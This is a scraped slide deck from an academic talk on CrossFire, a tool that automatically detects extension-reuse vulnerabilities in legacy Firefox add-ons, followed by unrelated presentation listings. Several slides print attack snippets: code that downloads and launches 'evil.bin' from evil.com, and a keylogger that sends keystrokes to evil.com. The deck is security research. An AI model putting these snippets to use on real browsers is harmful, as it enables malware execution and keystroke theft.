automated detection of firefox extension reuse
play

Automated Detection of Firefox Extension- Reuse Vulnerabilities - PowerPoint PPT Presentation

Oct 05, 2022 •319 likes •660 views

Automated Detection of Firefox Extension- Reuse Vulnerabilities Click to edit Master text styles Second level Third level Fourth level Fifth level Ahmet S BUYUKKAYHAN William ROBERTSON Who are we? Click to edit

  1. Automated Detection of Firefox Extension- Reuse Vulnerabilities • Click to edit Master text styles — Second level • Third level — Fourth level » Fifth level Ahmet S BUYUKKAYHAN William ROBERTSON

  2. Who are we? • Click to edit Master text styles • Assistant professor of computer science at Northeastern — Second level University in Boston, MA • Co-directs the NEU Systems Security Lab with Engin Kirda • Third level — Fourth level • Systems, network, and software security researcher » Fifth level • Past winner of DEFCON CTF with Shellphish – (a long, long time ago…) 2

  3. Who are we? • Click to edit Master text styles • PhD Candidate at Northeastern University — Second level – Authored peer-reviewed conference and journal papers in top-tier security venues • Third level • Member of the NEU Systems Security Lab — Fourth level » Fifth level 3

  4. Singapore • Click to edit Master text styles — Second level • Third level — Fourth level » Fifth level 4

  5. Boston • Click to edit Master text styles — Second level • Third level — Fourth level » Fifth level 5

  6. Agenda • Click to edit Master text styles • Background — Second level • Third level • Extension-Reuse Attacks — Fourth level • CrossFire & Demo » Fifth level • Evaluation • Conclusion 6

  7. • Click to edit Master text styles — Second level • Third level — Fourth level » Fifth level Background

  8. Browser Extensions • Click to edit Master text styles • Add new capabilities, — Second level customization to browsers • Third level • ~15K extensions in Mozilla — Fourth level Add-ons repository » Fifth level • Popular ones have millions of users • Mostly written in JavaScript 8

  9. Legacy Firefox Extensions • Click to edit Master text styles • Shared JavaScript namespace — Second level – Extensions can read/write objects or variables of others – Can invoke functionality of others • Third level • Shared window — Fourth level XUL XUL XUL – Read/write GUI elements » Fifth level JavaScript – Listen to all events • No privilege separation XPCOM – Full access to filesystem, network… File System Network 9

  10. Threat Model • Click to edit Master text styles • The browser is an attractive target — Second level – Extension authors are untrusted • Vulnerable extensions can be exploited • Third level – “Benign-but-buggy” threat model — Fourth level • Malicious extensions are a real threat » Fifth level – Trick users into installing malicious 161 malicious extensions extensions are blocked – Powerful (“man-in-the-browser” attacks) by Mozilla + – Easy to develop, difficult to detect + https://addons.mozilla.org/en-US/firefox/blocked/ – Feb 2016 10

  11. Existing Methods for Protection • Click to edit Master text styles • Enforcing browser — Second level marketplaces for extensions – Automated analysis • Third level – Human reviews — Fourth level – Extension signing » Fifth level – “Vetting” • Extension isolation – Least privilege and policy-based enforcement 11

  12. Add-on SDK (a.k.a., Jetpack) • Click to edit Master text styles • Introduced in 2009 — Second level October 2014 • Isolates extensions from each other 12.0% of the top 2,000 • Third level • Separate content and core scripts — Fourth level March 2016 22.9% of the top 2,000 • Implements principle of least » Fifth level privilege Release Date of • But, adoption has been slow WebExtensions in Q3 2016 • Superseded by WebExtensions 12

  13. • Click to edit Master text styles — Second level • Third level — Fourth level » Fifth level Extension-Reuse Attacks

  14. Attack Model • Click to edit Master text styles — Second level Evil Extension Evil Extension (No Sensitive Calls) • Third level Extension X Extension Y — Fourth level No Suspicious Behavior » Fifth level Sensitive Calls Sensitive Calls Vetting Sandbox Victim`s Browser 14

  15. Impact • Click to edit Master text styles • Lack of isolation leaves legacy — Second level extensions defenseless against capability leaks • Third level • Attackers can stitch together — Fourth level exploits by abusing capabilities » Fifth level • The more power vulnerable extensions have, the easier it is for an evil extension 15

  16. Download & Execute Evil Binary • Click to edit Master text styles const WebBrowserPersist = Components.Constructor( — Second level "@mozilla.org/embedding/browser/nsWebBrowserPersist;1", "nsIWebBrowserPersist"); • Third level var persist = WebBrowserPersist(); — Fourth level var targetFile = Components.classes["@mozilla.org/file/local;1"] » Fifth level .createInstance(Components.interfaces.nsILocalFile); targetFile.initWithPath(“evil.bin"); persist.saveURI( “http://evil.com/evil.bin", null, null, null, "", targetFile, null); targetFile.launch(); 16

  17. Extension-reuse Attack Example • Click to edit Master text styles var files = [{ Extension — Second level href: $url, description: "", Download Execute • Third level fname: $path, noRedir: true — Fourth level Extension X Extension Y }]; » Fifth level gFlashGotService.download(files); var gPrefMan = new GM_PrefManager(); File Internet gPrefMan.setValue(“editor”, $path); System GM_util.openInEditor(); Exe 17

  18. To Reuse or Not To Reuse • Click to edit Master text styles const WebBrowserPersist = var files = [{ Components.Constructor("@mozilla.org — Second level href: $url, /embedding/browser/nsWebBrowserPersi description: "", st;1", "nsIWebBrowserPersist"); • Third level fname: $path, var persist = WebBrowserPersist(); noRedir: true var targetFile = — Fourth level }]; Components.classes["@mozilla.org/fil » Fifth level gFlashGotService.download(files); e/local;1"].createInstance(Component s.interfaces.nsILocalFile); targetFile.initWithPath( $path ); var gPrefMan = new GM_PrefManager(); persist.saveURI( $url , null, null, gPrefMan.setValue(“editor”, $path); null, "", targetFile, null); GM_util.openInEditor(); targetFile.launch(); 18

  19. Another Example • Click to edit Master text styles • A key logger, which sends each key press to evil.com — Second level gd12.dicInline.urlWikPrefix = "http://evil.com/GD12_YOUR_LANG/steal.php?key="; • Third level gd12.keydownHandler = function(e) { gd12.dicInline.lookupWikt(String.fromCharCode(e.which), false, false); — Fourth level }; » Fifth level gd12.init(); Evil.com Internet 19

  20. • Click to edit Master text styles — Second level • Third level — Fourth level » Fifth level CrossFire

  21. CrossFire Overview • Click to edit Master text styles — Second level • Third level — Fourth level » Fifth level 21

  22. DEMO • Click to edit Master text styles — Second level • Third level — Fourth level » Fifth level 22

  23. • Click to edit Master text styles — Second level • Third level — Fourth level » Fifth level Evaluation

  24. Method • Click to edit Master text styles • Top 10 most downloaded extensions — Second level – Manual analysis on all set • Top 2000 most downloaded extensions • Third level – Manual analysis on random set of 323 — Fourth level » Fifth level • Case Study – Developed an extension with cross- extension function call – Applied to full review 24

  25. Top 10 Firefox Extensions • Click to edit Master text styles Extension Name Automated Exploits Manual Exploits False Positives # of Users Adblock Plus 0 0 4 22 M — Second level Video DownloadHelper 0 15 0 6.5 M • Third level Firebug 0 1 0 3 M — Fourth level NoScript 2 5 2 2.5 M DownThemAll! 0 5 0 1.5 M » Fifth level Greasemonkey 1 3 2 1.5 M Web of Trust 1 33 15 1.3 M Flash Video Down. 4 1 1 1.3 M FlashGot Mass Down. 3 5 9 1.3 M Down. YouTube Videos 0 2 1 1 M 25

  26. Summary of Results • Click to edit Master text styles Detected Vulnerabilities – Random Set Positive Vulnerabilities by Attack Type — Second level True Positives False Positives Manual Automated • Third level — Fourth level 51 96 20% 27% » Fifth level 255 204 73% 80% 26

  27. Breakdown of Positive Vulnerabilities • Click to edit Master text styles Category Description Positive Vulnerabilities By Category — Second level File I/O Code Execution Execute binary or JS 16% Event Listener • Third level File I/O Read from/write to Registration Filesystem 12% — Fourth level Network Access Open a URI or download a file Preference » Fifth level Access Preference Access Read/write browser 3% settings Event Listener Reg. Key logging events only Code Execution 3% Network Access 66% 27

  28. Performance • Click to edit Master text styles • Fast static analysis — Second level – ~ 1 sec average (per extension) • Third level Min Q1 Median Mean Q3 Max 0.05s 0.18s 0.28s 1.06s 0.51s 763.91s — Fourth level » Fifth level • Fast exploit generation – ~ 380 secs (~ 6 mins) on average (per exploit) Min Q1 Median Mean Q3 Max 30s 192s 270s 378.6s 550.8 2160s 28

Download Presentation
Download Policy: The content available on the website is offered to you 'AS IS' for your personal information and use only. It cannot be commercialized, licensed, or distributed on other websites without prior consent from the author. To download a presentation, simply click this link. If you encounter any difficulties during the download process, it's possible that the publisher has removed the file from their server.

Recommend

TRACER TUTORIAL: TEXT REUSE DETECTION INTRODUCTION TO HISTORICAL TEXT REUSE DETECTION M arco B

TRACER TUTORIAL: TEXT REUSE DETECTION INTRODUCTION TO HISTORICAL TEXT REUSE DETECTION M arco B

TRACER TUTORIAL: TEXT REUSE DETECTION INTRODUCTION TO HISTORICAL TEXT REUSE DETECTION M arco B uchler, Emily Franzini and Greta Franzini TABLE OF CONTENTS 1. Who am I? 2. What is text reuse? 3. Aspects of text reuse 4. ACID for the Digital

584 views • 34 slides
Automated fault detection for Automated fault detection for Autosub6000: Autosub6000: What we've

Automated fault detection for Automated fault detection for Autosub6000: Autosub6000: What we've

Automated fault detection for Automated fault detection for Autosub6000: Autosub6000: What we've achieved in a year? TSEM talk @ Institute of Cybernetics, Tallinn, Estonia Juhan Ernits, March 9, 2010 Overview of todays talk Overview of today s

490 views • 26 slides
By JoseeAntonioR INDEX OF CONTENTS 1.- What is Firefox? 2.- Uses of Firefox 3.- How To:

By JoseeAntonioR INDEX OF CONTENTS 1.- What is Firefox? 2.- Uses of Firefox 3.- How To:

Introduction to Firefox By JoseeAntonioR INDEX OF CONTENTS 1.- What is Firefox? 2.- Uses of Firefox 3.- How To: Download Files 4.- How To: History 5.- How To: Tabbing 6.- How To: App Tabs 7.- How To: Set Homepage 8.- How To: Block

557 views • 16 slides
Moving Forward Using Automated Measures for Lameness Detection Nria Chapinal, PhD Animal

Moving Forward Using Automated Measures for Lameness Detection Nria Chapinal, PhD Animal

Moving Forward Using Automated Measures for Lameness Detection Nria Chapinal, PhD Animal Welfare Program, UBC April 14, 2010 Outline Introduction Visual/subjective methods of detection Automated methods of detection Examples

905 views • 47 slides
TRACER TUTORIAL: TEXT REUSE DETECTION RECENT WORK M arco B uchler, Emily Franzini and Greta

TRACER TUTORIAL: TEXT REUSE DETECTION RECENT WORK M arco B uchler, Emily Franzini and Greta

TRACER TUTORIAL: TEXT REUSE DETECTION RECENT WORK M arco B uchler, Emily Franzini and Greta Franzini METHODOLOGY Basic idea: Embed historical text reuse in Shannons N oisy Channel theorem. 2/26 MICROVIEW II Source: Stefan J anicke,

433 views • 26 slides
1 Infrastructure Requirements Limit Reuse Planned Indirect Potable Reuse (Purple pipe may be a

1 Infrastructure Requirements Limit Reuse Planned Indirect Potable Reuse (Purple pipe may be a

Overview of Presentation DIRECT POTABLE REUSE: A PATH FORWARD: Take Home Message Reuse Opportunities De Facto and Planned Indirect Potable Reuse 2012 WATER REUSE CONFERENCE Proposed Direct Potable Reuse Strategies Boise, ID

599 views • 8 slides
Continuous Localization Agenda Brief History Q&A 1. 4. How we shipped Firefox Continuous

Continuous Localization Agenda Brief History Q&A 1. 4. How we shipped Firefox Continuous

Continuous Localization Agenda Brief History Q&A 1. 4. How we shipped Firefox Continuous L10n 2. Localizing Firefox Nightly 3. Android Analysis of our Android Apps Public 2 Shipping Localized Firefox over time Public 3 The

212 views • 18 slides
Firefox POCs BUG 612029: Remote denial of Service POC Actual POC comes from: BUG 833874 Eats

Firefox POCs BUG 612029: Remote denial of Service POC Actual POC comes from: BUG 833874 Eats

Firefox POCs BUG 612029: Remote denial of Service POC Actual POC comes from: BUG 833874 Eats up memory! Notice no unresponsive script dialogue Firefox version 13 In current firefox version -- warning + debug option, no

254 views • 12 slides
SURFnet IDS / OS3 UvA Project Extension of the SURFnet Intrusion Detection System Sensors to

SURFnet IDS / OS3 UvA Project Extension of the SURFnet Intrusion Detection System Sensors to

SURFnet IDS / OS3 UvA Project Extension of the SURFnet Intrusion Detection System Sensors to Microsoft Windows XP Michael Rave Coen Steenbeek 7 February 2007 Extension of the SURFnet Intrusion Detection System Sensors to Microsoft Windows XP

203 views • 18 slides
S MV -H UNTER : Large Scale, Automated Detection of SSL/TLS Man-in-the-Middle Vulnerabilities in

S MV -H UNTER : Large Scale, Automated Detection of SSL/TLS Man-in-the-Middle Vulnerabilities in

S MV -H UNTER : Large Scale, Automated Detection of SSL/TLS Man-in-the-Middle Vulnerabilities in Android Apps David Sounthiraraj Justin Sahs Garret Greenwood Zhiqiang Lin Latifur Khan University of Texas at Dallas February 26, 2014

671 views • 40 slides
Firefox quality Mozilla Paris | FOSDEM | Feb 3rd 2018 Bonjour ! Je suis Sylvestre Ledru Je

Firefox quality Mozilla Paris | FOSDEM | Feb 3rd 2018 Bonjour ! Je suis Sylvestre Ledru Je

Firefox quality Mozilla Paris | FOSDEM | Feb 3rd 2018 Bonjour ! Je suis Sylvestre Ledru Je parle de Firefox Quality Twitter @SylvestreLedru 2 Bonjour ! 3 Bonjour ! 4 Bonjour ! 5 The Firefox scale About:Firefox We release every 6

775 views • 41 slides
Python for Informatics Database Handout Download and install FireFox and the SQLite Manager

Python for Informatics Database Handout Download and install FireFox and the SQLite Manager

Python for Informatics Database Handout Download and install FireFox and the SQLite Manager http://www.mozilla.org/enUS/firefox/new/ https://addons.mozilla.org/enUS/firefox/addon/sqlitemanager/ Queries insert into Users (name, email) values

503 views • 3 slides
Introduction to Historical Text Reuse Detection Marco Bchler, Emily Franzini, Greta Franzini,

Introduction to Historical Text Reuse Detection Marco Bchler, Emily Franzini, Greta Franzini,

Introduction to Historical Text Reuse Detection Marco Bchler, Emily Franzini, Greta Franzini, Maria Moritz eTRAP Research Group Gttingen Centre for Digital Humanities Institute of Computer Science Georg August University Gttingen, Germany

714 views • 25 slides
A new version of Firefox is available Rapid Release of Quality Firefox Products Lukas Blakk

A new version of Firefox is available Rapid Release of Quality Firefox Products Lukas Blakk

A new version of Firefox is available Rapid Release of Quality Firefox Products Lukas Blakk & Sylvestre Ledru Who are we ? Sylvestre Lukas Has been at Mozilla for a year Mozillian since 2006 Debian Developer Release

462 views • 30 slides
SlowFuzz: Automated Domain-Independent Detection of Algorithmic Complexity Vulnerabilities

SlowFuzz: Automated Domain-Independent Detection of Algorithmic Complexity Vulnerabilities

SlowFuzz: Automated Domain-Independent Detection of Algorithmic Complexity Vulnerabilities Theofilos Petsios , Jason Zhao, Angelos D. Keromytis, and Suman Jana Columbia University ACM Conference on Computer and Communications Security (CCS)

563 views • 38 slides
Towards Automated Melanoma Detection with Deep Learning: Data Purification and Augmentation

Towards Automated Melanoma Detection with Deep Learning: Data Purification and Augmentation

Motivation Related work Proposed approach Empirical results Conclusion Towards Automated Melanoma Detection with Deep Learning: Data Purification and Augmentation Devansh Bisla , Anna Choromanska, Russell S. Berman, Jennifer A. Stein, David

359 views • 15 slides
ON THE FEASIBILITY OF EXTENDING OBLIVIOUS TRANSFER Yehuda Lindell Yehuda Lindell Hila Zarosim

ON THE FEASIBILITY OF EXTENDING OBLIVIOUS TRANSFER Yehuda Lindell Yehuda Lindell Hila Zarosim

ON THE FEASIBILITY OF EXTENDING OBLIVIOUS TRANSFER Yehuda Lindell Yehuda Lindell Hila Zarosim Hila Zarosim TCC 2013 Obli i Oblivious Transfer T f The other message message remains secret to the the receiver Obli i Oblivious

757 views • 38 slides
Security Architecture Presenter: Jienan Liu Network, Intelligence & security Lab outline

Security Architecture Presenter: Jienan Liu Network, Intelligence & security Lab outline

Chrome Extension Security Architecture Presenter: Jienan Liu Network, Intelligence & security Lab outline Chrome extension introduction Threats towards extension Chrome extensions security architecture What is Chrome

348 views • 23 slides
C-SPARQL: A Continuous Extension of SPARQL Marco Balduini marco.balduini@polimi.it Share,

C-SPARQL: A Continuous Extension of SPARQL Marco Balduini marco.balduini@polimi.it Share,

Stream Reasoning for Linked Data M. Balduini, J-P Calbimonte, O. Corcho, D. Dell'Aglio, E. Della Valle http://streamreasoning.org/events/sr4ld2014 C-SPARQL: A Continuous Extension of SPARQL Marco Balduini marco.balduini@polimi.it Share,

707 views • 37 slides
5.1 CABINETMAKERS SUPPLY www.cabinetmakerssupply.net fax) 703-421-6333 (ph) 703-421-6331 3554 -

5.1 CABINETMAKERS SUPPLY www.cabinetmakerssupply.net fax) 703-421-6333 (ph) 703-421-6331 3554 -

CABINETMAKERS SUPPLY www.cabinetmakerssupply.net fax) 703-421-6333 (ph) 703-421-6331 DRAWER SLIDES 10032 Precision Slides Use for box drawer or pedestal file drawers up to 20 wide. Manufactured by an ISO 9001 registered plant of heat hardened

312 views • 13 slides
Millimeter-Wave Human Blockage at 73 GHz with a Simple Double Knife-Edge Diffraction Model and

Millimeter-Wave Human Blockage at 73 GHz with a Simple Double Knife-Edge Diffraction Model and

Millimeter-Wave Human Blockage at 73 GHz with a Simple Double Knife-Edge Diffraction Model and Extension for Directional Antennas IEEE VTC2016-Fall, Montreal, Canada, Sept. 20, 2016 George R. MacCartney Jr., Sijia Deng, Shu Sun, and Theodore S.

390 views • 19 slides
Obliv-C: A Simple C Extension for SMC Samee Zahur samee@virginia.edu Project repository:

Obliv-C: A Simple C Extension for SMC Samee Zahur samee@virginia.edu Project repository:

Obliv-C: A Simple C Extension for SMC Samee Zahur samee@virginia.edu Project repository: github.com/samee/obliv-c Sample Stats Small samples hu661AD0.snp and hu604D39.snp Execuon me 8.47 seconds Circuit size 19,041,149

214 views • 7 slides
Lecture 6.1: Fields and their extensions Matthew Macauley Department of Mathematical Sciences

Lecture 6.1: Fields and their extensions Matthew Macauley Department of Mathematical Sciences

Lecture 6.1: Fields and their extensions Matthew Macauley Department of Mathematical Sciences Clemson University http://www.math.clemson.edu/~macaule/ Math 4120, Modern Algebra M. Macauley (Clemson) Lecture 6.1: Fields and their extensions

202 views • 8 slides
Capturing the elevation dependence of ITD using an extension of the spherical-head model

Capturing the elevation dependence of ITD using an extension of the spherical-head model

Capturing the elevation dependence of ITD using an extension of the spherical-head model Rahulram Sridhar 3D3A Laboratory, Princeton University This talk is based on the work by Sridhar and Choueiri, published under the same title as paper

800 views • 53 slides

More recommend